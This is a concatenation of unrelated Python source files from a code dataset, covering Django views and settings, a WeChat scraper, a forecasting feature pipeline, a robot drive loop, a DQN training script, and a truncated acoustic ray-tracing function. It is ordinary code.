            return redirect('dashboard')
    else:
        form = SignUpForm()
    return render(request, 'registration/signup.html', {'form': form})
| StarcoderdataPython |
12851838 | <reponame>GingerWWW/news_spider<filename>tools/weixin.py
#!/usr/bin/env python
# encoding: utf-8
"""
@author: zhanghe
@software: PyCharm
@file: weixin.py
@time: 2018-02-10 17:55
"""
import re
import time
import hashlib
# from urlparse import urljoin # PY2
# from urllib.parse import urljoin # PY3
from future.moves.urllib.parse import urljoin
import execjs
from tools.char import un_escape
from config import current_config
from models.news import FetchResult
from news.items import FetchResultItem
from apps.client_db import db_session_mysql
from maps.platform import WEIXIN, WEIBO
BASE_DIR = current_config.BASE_DIR
def get_finger(content_str):
    """Return the hex MD5 digest ("fingerprint") of *content_str*.

    Accepts both text and bytes; text is UTF-8 encoded before hashing.
    BUG FIX: the original referenced the Python 2-only name ``unicode``,
    raising NameError on Python 3.

    :param content_str: str or bytes to fingerprint
    :return: 32-char lowercase hex digest
    """
    if not isinstance(content_str, bytes):
        content_str = content_str.encode('utf-8')
    m = hashlib.md5()
    m.update(content_str)
    return m.hexdigest()
def parse_weixin_js_body(html_body, url=''):
    """Extract the inline ``var msgList`` JavaScript from a WeChat profile page.

    Returns the concatenated captured script text, or '' (after logging) when
    the page does not match the expected layout.
    """
    pattern = r'<script type="text/javascript">.*?(var msgList.*?)seajs.use\("sougou/profile.js"\);.*?</script>'
    matches = re.findall(pattern, html_body, re.S)
    if not matches:
        print('parse error url: %s' % url)
    return ''.join(matches)
def parse_weixin_article_id(html_body):
    """Return the numeric ``nonce`` attribute of the first inline <script> tag.

    Raises IndexError if no matching tag is present (same as the original).
    """
    matches = re.findall(r'<script nonce="(\d+)" type="text\/javascript">', html_body, re.I)
    return matches[0]
def add_img_src(html_body):
    """Duplicate each lazy-load ``data-src`` attribute value as a real ``src``.

    Turns ``data-src="URL"`` into ``data-src="URL" src="URL"`` so images render
    without the site's lazy-loading JS. FIX: removed stray debug ``print`` calls.

    NOTE(review): like the original, this uses a global string replace, so a URL
    appearing more than once is rewritten at every occurrence per iteration.
    """
    img_data_src_list = re.findall(r'data-src="(.*?)"', html_body, re.I)
    for img_src in img_data_src_list:
        html_body = html_body.replace(img_src, '%(img_src)s" src="%(img_src)s' % {'img_src': img_src})
    return html_body
def get_img_src_list(html_body, host_name='/', limit=None):
    """Collect ``src`` attribute values that start with *host_name*.

    :param limit: when truthy, return at most this many results.
    """
    pattern = r'src="(%s.*?)"' % host_name
    srcs = re.findall(pattern, html_body, re.I)
    return srcs[:limit] if limit else srcs
def check_article_title_duplicate(article_title):
    """Return how many stored WeChat fetch results share this title's fingerprint."""
    session = db_session_mysql()
    duplicate_count = (
        session.query(FetchResult)
        .filter(FetchResult.platform_id == WEIXIN,
                FetchResult.article_id == get_finger(article_title))
        .count()
    )
    return duplicate_count
class ParseJsWc(object):
    """
    Parse WeChat (Weixin) article-list data embedded as inline JavaScript.

    The raw JS (containing ``var msgList = {...}``) is extended with a small
    accessor function and evaluated via execjs; the resulting message list is
    flattened into dicts ready for storage.
    """

    def __init__(self, js_body):
        # Raw JavaScript extracted from the profile page.
        self.js_body = js_body
        # Append the r_msg_list() accessor before compiling.
        self._add_js_msg_list_fn()
        self.ctx = execjs.compile(self.js_body)
        # print(self.ctx)

    def _add_js_msg_list_fn(self):
        # Accessor that exposes msgList.list to execjs' call() interface.
        js_msg_list_fn = """
        function r_msg_list() {
            return msgList.list;
        };
        """
        self.js_body += js_msg_list_fn

    def parse_js_msg_list(self):
        """Flatten the evaluated msgList into article dicts.

        Each entry yields the primary article plus any items in
        ``multi_app_msg_item_list``; all share the publish time of their
        parent ``comm_msg_info`` record.
        """
        msg_list = self.ctx.call('r_msg_list')
        app_msg_ext_info_list = [i['app_msg_ext_info'] for i in msg_list]
        # Publish timestamps, formatted; index-aligned with the entries above.
        comm_msg_info_date_time_list = [time.strftime("%Y-%m-%d %H:%M:%S", time.localtime(i['comm_msg_info']['datetime'])) for i in msg_list]
        # msg_id_list = [i['comm_msg_info']['id'] for i in msg_list]
        # Primary article per push; article_id is an MD5 fingerprint of the title.
        msg_data_list = [
            {
                # 'article_id': '%s_000' % msg_id_list[index],
                'article_id': get_finger(i['title']),
                'article_url': urljoin('https://mp.weixin.qq.com', un_escape(i['content_url'])),
                'article_title': i['title'],
                'article_abstract': i['digest'],
                'article_pub_time': comm_msg_info_date_time_list[index],
            } for index, i in enumerate(app_msg_ext_info_list)
        ]
        # Secondary articles bundled with each push (index_j maps back to the
        # parent push for the shared publish time).
        msg_ext_list = [i['multi_app_msg_item_list'] for i in app_msg_ext_info_list]
        for index_j, j in enumerate(msg_ext_list):
            for index_i, i in enumerate(j):
                msg_data_list.append(
                    {
                        # 'article_id': '%s_%03d' % (msg_id_list[index_j], index_i + 1),
                        'article_id': get_finger(i['title']),
                        'article_url': urljoin('https://mp.weixin.qq.com', un_escape(i['content_url'])),
                        'article_title': i['title'],
                        'article_abstract': i['digest'],
                        'article_pub_time': comm_msg_info_date_time_list[index_j],
                    }
                )
        return msg_data_list
| StarcoderdataPython |
1619354 | """
Django settings for test_django project.
Generated by 'django-admin startproject' using Django 1.11.6.
For more information on this file, see
https://docs.djangoproject.com/en/1.11/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.11/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))

# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.11/howto/deployment/checklist/

# SECURITY WARNING: keep the secret key used in production secret!
# (placeholder scrubbed from the published source)
SECRET_KEY = '<KEY>'

# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True

# Empty is fine while DEBUG is on; must be populated for production.
ALLOWED_HOSTS = []
# Application definition

INSTALLED_APPS = [
    'django.contrib.admin',
    'django.contrib.auth',
    'django.contrib.contenttypes',
    'django.contrib.sessions',
    'django.contrib.messages',
    'django.contrib.staticfiles',
    'django_extensions',
    # The package under test plus its test app.
    'djenga_tests',
    'djenga',
]

MIDDLEWARE = [
    'django.middleware.security.SecurityMiddleware',
    'django.contrib.sessions.middleware.SessionMiddleware',
    'django.middleware.common.CommonMiddleware',
    'django.middleware.csrf.CsrfViewMiddleware',
    'django.contrib.auth.middleware.AuthenticationMiddleware',
    'django.contrib.messages.middleware.MessageMiddleware',
    'django.middleware.clickjacking.XFrameOptionsMiddleware',
]

ROOT_URLCONF = 'djenga_tests.urls'

TEMPLATES = [
    {
        'BACKEND': 'django.template.backends.django.DjangoTemplates',
        'DIRS': [],
        'APP_DIRS': True,
        'OPTIONS': {
            'context_processors': [
                'django.template.context_processors.debug',
                'django.template.context_processors.request',
                'django.contrib.auth.context_processors.auth',
                'django.contrib.messages.context_processors.messages',
            ],
        },
    },
]
# NOTE(review): module path 'tests.wsgi' differs from the 'djenga_tests'
# package used by ROOT_URLCONF above -- confirm which package actually
# contains the WSGI module.
WSGI_APPLICATION = 'tests.wsgi.application'

# Database
# https://docs.djangoproject.com/en/1.11/ref/settings/#databases

DATABASES = {
    'default': {
        'ENGINE': 'django.db.backends.sqlite3',
        'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
    }
}

# Password validation
# https://docs.djangoproject.com/en/1.11/ref/settings/#auth-password-validators

AUTH_PASSWORD_VALIDATORS = [
    {
        'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
    },
]

# Internationalization
# https://docs.djangoproject.com/en/1.11/topics/i18n/

LANGUAGE_CODE = 'en-us'

TIME_ZONE = 'CST6CDT'

USE_I18N = True

USE_L10N = True

USE_TZ = True

# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.11/howto/static-files/

STATIC_URL = '/static/'
# djenga settings exercised by the test app.
DJENGA_FROM_EMAIL = ''
DJENGA_DEFAULT_RECIPIENTS = []
DJENGA_ENCRYPTION_KEY = 'sesame'
DJENGA_CELERY_MODULE = 'djenga_tests.celery'

# Celery
CELERY_TIMEZONE = 'CST6CDT'
CELERY_BROKER_URL = 'redis://127.0.0.1:6379/14'
# Fixed invalid scheme: was 'redisd://', which celery/kombu does not
# recognize as a backend transport (the broker above already uses redis://).
CELERY_RESULT_BACKEND = 'redis://127.0.0.1:6379/15'
CELERY_RESULT_EXPIRES = 30 * 24 * 60 * 60  # 30 days
# Pickle serialization is acceptable for a local test broker only; never use
# it with a broker reachable by untrusted clients.
CELERY_TASK_SERIALIZER = 'pickle'
CELERY_RESULT_SERIALIZER = 'pickle'
CELERY_ACCEPT_CONTENT = ['pickle', 'json']
SHELL_PLUS = 'ipython'
LOGGING = {
    'root': {
        'level': 'DEBUG',
        'handlers': [ 'console-brief' ],
    },
    'version': 1,
    'disable_existing_loggers': False,
    'formatters': {
        'json': {
            # NOTE(review): module path 'djenga.logging' differs from the
            # 'djenga.loggers' package used by the two formatters below --
            # confirm which module actually defines these classes.
            u'()': 'djenga.logging.JsonFormatter',
        },
        'console-detailed': {
            u'format': u'%(funcName)s:%(lineno)d %(message)s',
            u'()': u'djenga.loggers.ColorFormatter',
        },
        'console-brief': {
            # uncomment this line if there is a logger
            # printing out stuff that you want to suppress
            # during debugging
            # u'format': u'[%(name)s] %(message)s',
            u'format': u'%(message)s',
            u'()': u'djenga.loggers.BriefColorFormatter',
        },
    },
    'handlers': {
        'console-brief': {
            'level': 'DEBUG',
            'class': 'logging.StreamHandler',
            'stream': 'ext://sys.stdout',
            'formatter': 'console-brief',
        },
    },
}
| StarcoderdataPython |
6419930 | <gh_stars>0
import pandas as pd
import numpy as np
from sklearn.preprocessing import LabelEncoder
class FeatureEngineering:
    """Feature-engineering pipeline for the restaurant-visitor forecasting data.

    The raw kaggle CSVs are loaded on construction; each public method
    performs one pipeline step and mutates ``self.air_visits`` (train) and
    ``self.test`` in place. ``main`` drives the full pipeline.
    """

    def __init__(self):
        self.air_visits = pd.read_csv("../input/restaurant-visitor-forecasting/train.csv")
        self.air_reservations = pd.read_csv("../input/restaurant-visitor-forecasting/MetaData/MetaData/air_reserve.csv")
        self.hpg_reservations = pd.read_csv("../input/restaurant-visitor-forecasting/MetaData/MetaData/hpg_reserve.csv")
        self.air_stores = pd.read_csv("../input/restaurant-visitor-forecasting/MetaData/MetaData/air_store_info.csv")
        self.date_data = pd.read_csv("/kaggle/input/restaurant-visitor-forecasting/MetaData/MetaData/date_info.csv")
        self.test = pd.read_csv("/kaggle/input/restaurant-visitor-forecasting/test.csv")
        self.store_IDs = pd.read_csv("../input/restaurant-visitor-forecasting/MetaData/MetaData/store_id_relation.csv")

    def getProcessedData(self):
        """Return the (train, test) frames in their current state."""
        return self.air_visits, self.test

    def remove_2016_Data(self):
        """Drop the early-2016 rows that do not follow the periodic trend.

        From index 47699, i.e. dates after July 1, 2016, the series follows
        the periodic trend, so everything before that row is discarded.
        """
        self.air_visits = self.air_visits.sort_values('visit_date').reset_index(drop=True).iloc[47699:, :]

    def add_next_holiday_flg(self):
        """Merge calendar info onto train/test and add a next-day holiday flag."""
        # The calendar rows are date-ordered, so next_day_holiday_flg is just
        # holiday_flg shifted up by one row.
        hol_date = self.date_data["holiday_flg"].copy()
        # Drop the first row, then pad the final day; 0 (non-holiday) is
        # assumed for the day after the calendar ends.
        hol_date.drop(hol_date.head(1).index, inplace=True)
        hol_date.loc[len(hol_date) + 1] = 0
        self.date_data["next_day_holiday_flg"] = hol_date.reset_index(drop=True)
        self.air_visits = self.air_visits.merge(self.date_data, left_on="visit_date", right_on="calendar_date").drop("calendar_date", axis=1)
        self.test = self.test.merge(self.date_data, left_on="visit_date", right_on="calendar_date").drop("calendar_date", axis=1)

    def mergeStoreInfo(self):
        """Attach the air store metadata (genre, area, coordinates)."""
        self.air_visits = self.air_visits.merge(self.air_stores, on="air_store_id")
        self.test = self.test.merge(self.air_stores, on="air_store_id")

    def addSizeFeature(self):
        """Add the count of same-genre stores per area (local competition)."""
        air_competition = self.air_stores.groupby(["air_genre_name", "air_area_name"], as_index=False).size()
        self.air_visits = self.air_visits.merge(air_competition, on=["air_genre_name", "air_area_name"])
        self.test = self.test.merge(air_competition, on=["air_genre_name", "air_area_name"])

    def parseDate(self):
        """Split visit_date into month, year and day-of-week columns."""
        for df in (self.air_visits, self.test):
            df['visit_date'] = pd.to_datetime(df['visit_date'], format='%Y-%m-%d')
            df['month'] = df['visit_date'].dt.month
            df['year'] = df['visit_date'].dt.year
            df['dow'] = df['visit_date'].dt.dayofweek

    def _rank_encode(self, col, out_col):
        """Label-encode *col* by total visitors: rank 1 = fewest visitors."""
        enc = self.air_visits.groupby(col, as_index=False)['visitors'].sum().sort_values(by="visitors").reset_index(drop=True)
        enc[out_col] = range(1, len(enc) + 1)
        return enc.drop(columns="visitors")

    def create_area_genre_encoding(self):
        """Return (area, genre) frames holding the visitor-rank encodings."""
        return (self._rank_encode("air_area_name", "area_index_col"),
                self._rank_encode("air_genre_name", "genre_index_col"))

    def encodeAreaGenre(self):
        """Replace the area/genre name columns with their rank encodings."""
        area_encode, genre_encode = self.create_area_genre_encoding()
        self.air_visits = self.air_visits.merge(area_encode, on="air_area_name").drop(columns="air_area_name")
        self.air_visits = self.air_visits.merge(genre_encode, on="air_genre_name").drop(columns="air_genre_name")
        self.test = self.test.merge(area_encode, on="air_area_name").drop(columns="air_area_name")
        self.test = self.test.merge(genre_encode, on="air_genre_name").drop(columns="air_genre_name")

    def addAggregateFunctions(self):
        """Add min/mean/median/max/count visitor stats per (store, weekday)."""
        # All unique stores of the test set, crossed with the 7 weekdays.
        unique_stores = self.test['air_store_id'].unique()
        stores = pd.concat([pd.DataFrame({'air_store_id': unique_stores, 'dow': [i] * len(unique_stores)}) for i in range(7)], axis=0, ignore_index=True).reset_index(drop=True)
        # One grouped pass with named aggregation replaces the original five
        # separate groupby/rename/merge rounds.
        stats = self.air_visits.groupby(['air_store_id', 'dow'])['visitors'].agg(
            min_visitors='min',
            mean_visitors='mean',
            median_visitors='median',
            max_visitors='max',
            count_observations='count',
        ).reset_index()
        stores = pd.merge(stores, stats, how='left', on=['air_store_id', 'dow'])
        self.air_visits = pd.merge(self.air_visits, stores, how='left', on=['air_store_id', 'dow'])
        self.test = pd.merge(self.test, stores, how='left', on=['air_store_id', 'dow'])

    def oneHotEncode_dayOfWeek(self):
        """One-hot encode dow and drop the redundant day_of_week name column."""
        self.air_visits = pd.get_dummies(data=self.air_visits, columns=["dow"], prefix=["dow"])
        self.air_visits.drop(columns="day_of_week", inplace=True)
        self.test = pd.get_dummies(data=self.test, columns=["dow"], prefix=["dow"])
        self.test.drop(columns="day_of_week", inplace=True)

    @staticmethod
    def _aggregate_reservations(df):
        """Total reservation visitors and lead time per (store, visit date).

        Shared by the air and hpg preprocessing steps.
        """
        df['visit_datetime'] = pd.to_datetime(df['visit_datetime'])
        df['visit_date'] = df['visit_datetime'].dt.date
        df['reserve_datetime'] = pd.to_datetime(df['reserve_datetime'])
        # Vectorized replacement for the original row-wise
        # .apply(lambda x: (visit - reserve).days, axis=1); .dt.days floors
        # exactly like Timedelta.days.
        df['time_diff'] = (df['visit_datetime'] - df['reserve_datetime']).dt.days
        return df.groupby(['air_store_id', 'visit_date'], as_index=False)[['time_diff', 'reserve_visitors']].sum()

    def preprocess_airReservations(self):
        """Aggregate the air reservation log per store and visit date."""
        self.air_reservations = self._aggregate_reservations(self.air_reservations)

    def mergeStoreRelation(self):
        """Map hpg store ids onto air ids (inner join drops unmatched rows)."""
        self.hpg_reservations = pd.merge(self.hpg_reservations, self.store_IDs, how='inner', on=['hpg_store_id'])

    def preprocess_hpgReservations(self):
        """Aggregate the hpg reservation log, keyed by the mapped air ids."""
        self.mergeStoreRelation()
        self.hpg_reservations = self._aggregate_reservations(self.hpg_reservations)

    def mergeReservationData(self):
        """Left-join both aggregated reservation tables onto train and test."""
        self.air_visits['visit_date'] = self.air_visits['visit_date'].dt.date
        self.test['visit_date'] = self.test['visit_date'].dt.date
        # NOTE(review): both reservation tables contribute 'time_diff' and
        # 'reserve_visitors', so pandas suffixes the second pair _x/_y --
        # confirm downstream consumers expect those column names.
        self.air_visits = pd.merge(self.air_visits, self.air_reservations, how='left', on=['air_store_id', 'visit_date'])
        self.air_visits = pd.merge(self.air_visits, self.hpg_reservations, how='left', on=['air_store_id', 'visit_date'])
        self.test = pd.merge(self.test, self.air_reservations, how='left', on=['air_store_id', 'visit_date'])
        self.test = pd.merge(self.test, self.hpg_reservations, how='left', on=['air_store_id', 'visit_date'])

    def write_fe_csv(self):
        """Dump the engineered train/test frames to the working directory."""
        self.air_visits.to_csv('./fe_train.csv', index=False)
        self.test.to_csv('./fe_test.csv', index=False)
def main(fe):
    """Run every feature-engineering step in pipeline order and dump CSVs."""
    pipeline = (
        fe.remove_2016_Data,
        fe.add_next_holiday_flg,
        fe.mergeStoreInfo,
        fe.addSizeFeature,
        fe.parseDate,
        fe.encodeAreaGenre,
        fe.addAggregateFunctions,
        fe.oneHotEncode_dayOfWeek,
        fe.preprocess_airReservations,
        fe.preprocess_hpgReservations,
        fe.mergeReservationData,
        fe.write_fe_csv,
    )
    for step in pipeline:
        step()
if __name__ == '__main__':
    # Build the full feature set, then preview the engineered frames.
    fe = FeatureEngineering()
    main(fe)
    data, test = fe.getProcessedData()
    print(data.head())
    print(data.columns)
    print(test.head())
6658915 | <gh_stars>0
from scraper.model import ModelBase, CSVModel, JsonModel
from scraper.model.meeting_item import MeetingItem
class MeetingDetails(ModelBase, JsonModel, CSVModel):
    """One scraped meeting: metadata, document links and its agenda items."""

    def __init__(self, meeting_name=None, meeting_datetime=None, meeting_location=None,
                 published_agenda=None, agenda_packet=None, meeting_video=None,
                 agenda_status=None, minutes_status=None, published_minutes=None,
                 eComment=None, additional_notes=None, meeting_items=None):
        super().__init__()
        # Field order used by the CSV/JSON serialization mixins.
        self.field_names = [
            'meeting_name',
            'meeting_datetime',
            'meeting_location',
            'published_agenda',
            'agenda_packet',
            'meeting_video',
            'agenda_status',
            'minutes_status',
            'published_minutes',
            'eComment',
            'additional_notes',
            'meeting_items'
        ]
        # Tells the deserializer which class hydrates list-field entries.
        self.list_field_class_dict = {'meeting_items': MeetingItem}
        self._meeting_name = meeting_name
        self.meeting_datetime = meeting_datetime
        self._meeting_location = meeting_location
        # Fix: back the meeting_details property so reading it before its
        # setter runs raises no AttributeError (the attribute was never
        # initialized in the original __init__).
        self._meeting_details = None
        self.published_agenda = published_agenda
        self.agenda_packet = agenda_packet
        self.meeting_video = meeting_video
        self.agenda_status = agenda_status
        self.minutes_status = minutes_status
        self.published_minutes = published_minutes
        self.eComment = eComment
        self.additional_notes = additional_notes
        self.meeting_items = meeting_items

    @property
    def meeting_name(self):
        """Meeting name, newline-stripped and without a leading asterisk."""
        return self.remove_starting_asterisk(self.filter_newlines(self._meeting_name))

    @meeting_name.setter
    def meeting_name(self, raw_name):
        self._meeting_name = raw_name

    @property
    def meeting_location(self):
        """Meeting location with embedded newlines removed."""
        return self.filter_newlines(self._meeting_location)

    @meeting_location.setter
    def meeting_location(self, raw_meeting_location):
        self._meeting_location = raw_meeting_location

    @property
    def meeting_details(self):
        """Free-form details text with embedded newlines removed."""
        return self.filter_newlines(self._meeting_details)

    @meeting_details.setter
    def meeting_details(self, raw_meeting_details):
        self._meeting_details = raw_meeting_details

    def to_map(self):
        """Serialize to a dict, expanding meeting_items recursively."""
        map = super().to_map()
        if map is not None and map.get('meeting_items', None) is not None:
            map['meeting_items'] = MeetingItem.to_map_list(map['meeting_items'])
        return map
| StarcoderdataPython |
6465246 | <reponame>SJ-Z/DjangoSite
from django.shortcuts import render
from django.contrib.contenttypes.models import ContentType
from django.http import JsonResponse
from django.db.models import ObjectDoesNotExist
from likes.models import LikeCount, LikeRecord
def success_response(liked_num):
    """JSON payload for a successful like/unlike, carrying the new count."""
    return JsonResponse({'status': 'success', 'liked_num': liked_num})
def error_response(code, message):
    """JSON payload describing a failed like/unlike request."""
    return JsonResponse({'status': 'error', 'code': code, 'message': message})
def like_change(request):
    """Toggle a like on an arbitrary model instance and return JSON.

    Expects GET params: ``content_type`` (model name), ``object_id`` and
    ``is_like`` ('true' to add a like, anything else to cancel one).
    """
    # Fetch request data; only authenticated users may like.
    user = request.user
    if not user.is_authenticated:
        return error_response(401, '您尚未登录')
    content_type = request.GET.get('content_type')
    object_id = int(request.GET.get('object_id'))
    # Verify the target object actually exists.
    try:
        content_type = ContentType.objects.get(model=content_type)
        model_class = content_type.model_class()
        model_obj = model_class.objects.get(pk=object_id)
    except ObjectDoesNotExist:
        return error_response(404, '对象不存在')
    # Apply the change.
    if request.GET.get('is_like') == 'true':
        # A like was requested.
        like_record, created = LikeRecord.objects.get_or_create(content_type=content_type, object_id=object_id,
                                                                user=user)
        if created:
            # First like from this user: bump the counter.
            like_count, created = LikeCount.objects.get_or_create(content_type=content_type, object_id=object_id)
            like_count.liked_num += 1
            like_count.save()
            return success_response(like_count.liked_num)
        else:
            # Already liked; refuse a duplicate like.
            return error_response(402, '您已点赞过,不能重复点赞')
    else:
        # Cancellation was requested.
        if LikeRecord.objects.filter(content_type=content_type, object_id=object_id, user=user).exists():
            # A like exists: delete the record.
            like_record = LikeRecord.objects.get(content_type=content_type, object_id=object_id, user=user)
            like_record.delete()
            # Decrement the total like count.
            like_count, created = LikeCount.objects.get_or_create(content_type=content_type, object_id=object_id)
            if not created:
                like_count.liked_num -= 1
                like_count.save()
                return success_response(like_count.liked_num)
            else:
                return error_response(404, '数据错误')
        else:
            # No like on record; nothing to cancel.
            return error_response(402, '您没有点赞过,不能取消点赞')
| StarcoderdataPython |
77145 | # Here's a basic robot loop to drive a robot using the left analog stick of
# an Xbox controller. The robot left and right drive motors are assumed
# to be connected to channels 0 and 1 of a Maestro controller.
import maestro
import xbox
import drive
import time
m = maestro.Controller()
# Maestro channels 0 and 1 drive the left and right motors.
dt = drive.DriveTrain(m, 0, 1)
j = xbox.Joystick()

# Wrapping the robot loop in a try/finally structure makes sure that the
# motors stop if the code errors out or the loop completes.
try:
    enabled = True
    print "Robot loop started"
    while enabled:
        # Drive only while the joystick is connected; otherwise stop.
        if j.connected():
            # Arcade Drive: left-stick X steers, left-stick Y sets speed.
            # If controls are backwards, simply negate the respective input.
            dt.drive(j.leftX(), j.leftY())
            # Pressing the Xbox Back button disables the robot loop.
            if j.Back():
                enabled = False
        else:
            dt.stop()
        time.sleep(0.02)  # throttle the robot loop to around 50 Hz
finally:
    print "stopping robot"
    dt.stop()  # stop on error or loop completion
| StarcoderdataPython |
4802983 | from ferris import BasicModel, ndb
import logging
class Torrent(BasicModel):
    """Datastore model for a torrent, keyed by its hash string."""

    hashString = ndb.StringProperty()
    name = ndb.StringProperty()
    status = ndb.StringProperty()
    eta = ndb.DateTimeProperty()

    @classmethod
    def create(cls, params):
        """Create or update the entity keyed by params['hashString']."""
        existing = cls.get(params['hashString'])
        item = existing if existing else cls(id=params['hashString'])
        item.populate(**params)
        item.put()
        return item

    @classmethod
    def get(cls, key_name, key_only=False):
        """Fetch the entity (or, with key_only, its key) for *key_name*.

        Returns None for a falsy key name or a missing entity.
        """
        if not key_name:
            return None
        key = ndb.Key(cls, key_name)
        entity = key.get()
        if key_only:
            return key if entity else None
        return entity
9669850 | <gh_stars>0
import os
import numpy as np
from model import Agent
from utils import plot_learning_curve, make_env
LOAD = False   # True = load saved models and evaluate instead of training
VERSION = '0'  # suffix distinguishing output plot filenames

if __name__ == '__main__':
    env = make_env('SpaceInvaders-v0')
    best_score = -np.inf
    n_games = 1000
    algo = 'DQN'
    agent = Agent(input_space_dim=(env.observation_space.shape),
                  memory_size=50000, batch_size=32, action_num=6, gamma=0.99, epsilon_min=0.1,
                  epsilon_decay=5e-6, replace_count=5000, lr=1e-4, batch_norm=True, save=True, algo=algo)
    if LOAD:
        agent.load_models()

    # Output plot path, e.g. plots/DQN_SpaceInvaders-v0_lr0.0001_1000games0.png
    fname = algo + '_SpaceInvaders-v0_lr' + str(agent.lr) + '_' \
        + str(n_games) + 'games' + VERSION
    fname = fname + '.png'
    cur_dir = os.path.dirname(os.path.abspath(__file__))
    figure_file = os.path.join(cur_dir, '.\\plots\\', fname)

    n_steps = 0
    scores, eps_history, steps_array = [], [], []

    # Training loop
    for i in range(n_games):
        final = False
        observation = env.reset()
        score = 0
        while not final:
            action = agent.choose_action(observation)
            next_obs, reward, final, info = env.step(action)
            score += reward
            if not LOAD:
                # Learn only while training; evaluation runs skip replay/updates.
                agent.store_transition(state=observation, action=action,
                                       reward=reward, next_state=next_obs, final=bool(final))
                agent.learn()
            observation = next_obs
            n_steps += 1
        scores.append(score)
        steps_array.append(n_steps)
        # Rolling average over the last 100 episodes.
        avg_score = np.mean(scores[-100:])
        print('episode: ', i, 'score: ', score,
              ' average score %.1f' % avg_score, 'best score %.2f' % best_score,
              'epsilon %.2f' % agent.epsilon, 'steps', n_steps)
        if avg_score > best_score:
            # if not LOAD:
            #     agent.save_models()
            best_score = avg_score
        eps_history.append(agent.epsilon)
        if LOAD and n_steps >= 18000:
            # Cap evaluation runs at a fixed number of environment steps.
            break
    agent.save_models()
    plot_learning_curve(steps_array, scores, eps_history, figure_file)
| StarcoderdataPython |
3506624 |
# Based off of <NAME>' ray-tracing algorithm (2003)
# Finds path between two locations with an atmospheric profile in between #
###########################################################################
import warnings
import numpy as np
import pyximport
# Build the Cython wind-projection helper at import time, with the numpy
# headers on the include path, so the import below succeeds.
pyximport.install(setup_args={'include_dirs':[np.get_include()]})
from supra.Supracenter.cynwDir import nwDir
def cyscan(supra_pos, detec_pos, z_profile, wind=True, n_theta=180, n_phi=180, h_tol=330, v_tol=2000):
    """Ray-trace an optimal path from a Supracenter source to a detector.

    Lays a grid of launch angles, marches every candidate ray down through
    the layered atmosphere, and (when refinement triggers) re-centres the
    grid on the minimum-error angle. See pg 34 of SUPRACENTER for the
    geometry.

    Arguments:
        supra_pos: [array] source position in local coords [x, y, elevation]
        detec_pos: [array] detector position in local coords [x, y, elevation]
        z_profile: [array] atmosphere rows [height, c, wind speed, wind direction]
            (column 1 is used as a propagation speed: slowness s = 1/c)
        wind: [bool] if False the wind-speed column is zeroed
        n_theta, n_phi: [int] grid resolution of the takeoff / azimuth angles
        h_tol, v_tol: [float] acceptance tolerances on the landing error

    Returns:
        (t_arrival, azimuth_deg, takeoff_deg, error, trace) on success, or a
        5-element array of NaNs when no ray reaches the detector.
    """
    # Azimuths and wind directions are measured clockwise from north.

    # Switch to turn off winds (propagation speed is still used).
    if not wind:
        z_profile[:, 2] = 0

    found = False

    # Initial grid spacing: azimuth (full circle / n_theta) and takeoff
    # (90-180 degrees from vertical).
    dtheta = np.pi/n_theta
    dphi = np.pi/2/n_phi

    # Horizontal offsets between the source and the station.
    dx = detec_pos[0] - supra_pos[0]
    dy = detec_pos[1] - supra_pos[1]

    # Initial azimuth guess: straight toward the station.
    azth = np.arctan2(dy, dx)

    # Number of layers in the integration region.
    n_layers = len(z_profile)

    # Slowness s = 1/c (SUPRACENTER pg 35) and the layer elevations.
    s = 1.0/z_profile[0:n_layers, 1]
    z = z_profile[0:n_layers, 0]

    # Azimuth grid centred on the direct bearing.
    phi = np.linspace(azth - np.pi/2, azth + np.pi/2, n_phi)
    Phi = np.tile(phi, (n_theta, 1))

    # Wind components along phi and phi + pi/2 for every layer.
    u = nwDir(z_profile[:, 2], z_profile[:, 3], phi)
    v = nwDir(z_profile[:, 2], z_profile[:, 3], phi + np.pi/2)

    # Takeoff grid; nudge off the singularity at pi/2.
    theta = np.linspace(np.pi/2, np.pi, n_theta)
    theta[0] += 1e-6

    s_val = s[n_layers - 1]
    Theta = np.tile(theta, (n_phi, 1)).T

    # Wind along the azimuth direction in the source layer.
    u0 = np.tile(u[n_layers - 1, :], (n_theta, 1))

    # Ray parameter for every (takeoff, azimuth) pair.
    p = s_val*np.sin(Theta)/(1 + s_val*u0*np.sin(Theta))

    # Transformed horizontal displacements, accumulated layer by layer.
    X = np.zeros((n_theta, n_phi))
    Y = np.zeros((n_theta, n_phi))

    # Travel time accumulator.
    t_arrival = 0

    # Negative roots mark "turned" rays; silence the resulting warnings.
    np.seterr(divide='ignore', invalid='ignore')

    ### Scan loop ###
    while not found:

        trace = []
        a, b = np.cos(Phi), np.sin(Phi)
        last_z = 0

        for i in range(n_layers - 1):

            s2 = s[i]**2
            delz = z[i + 1] - z[i]

            if wind:
                # Per-layer wind components on the current azimuth grid.
                U = np.tile(u[i, :], (n_theta, 1))
                V = np.tile(v[i, :], (n_theta, 1))

                p2 = p/(1 - p*U)

                # All-NaN means every candidate ray has turned in this layer.
                A = delz/np.sqrt(s2 - p2**2)
                if np.isnan(A).all():
                    break

                # Equations (10) and (11).
                X += (p2 + s2*U)*A
                Y += s2*V*A
                last_z = i + 1
            else:
                # Equation (3): windless horizontal advance.
                X += p*(delz)/(np.sqrt(s2 - p**2))
                last_z = i + 1

        # Distance of every candidate landing point from the detector
        # (transform back to true coordinates inside the expression).
        E = np.sqrt(((a*X - b*Y - dx)**2 + (b*X + a*Y - dy)**2 + (z[n_layers - last_z - 1] - detec_pos[2])**2))

        with warnings.catch_warnings():
            warnings.simplefilter("ignore")
            k, l = np.where(E == np.nanmin(E))

        # All-NaN error surface: no usable ray (as in original Supracenter).
        if k.shape == (0, ):
            return np.array([np.nan, np.nan, np.nan, np.nan, np.nan])

        # Reduce to scalar indices, taking the middle match when several tie.
        # (Fixes the original `if len(k > 1):`, which took the length of a
        # boolean array and was therefore always true; since the middle of a
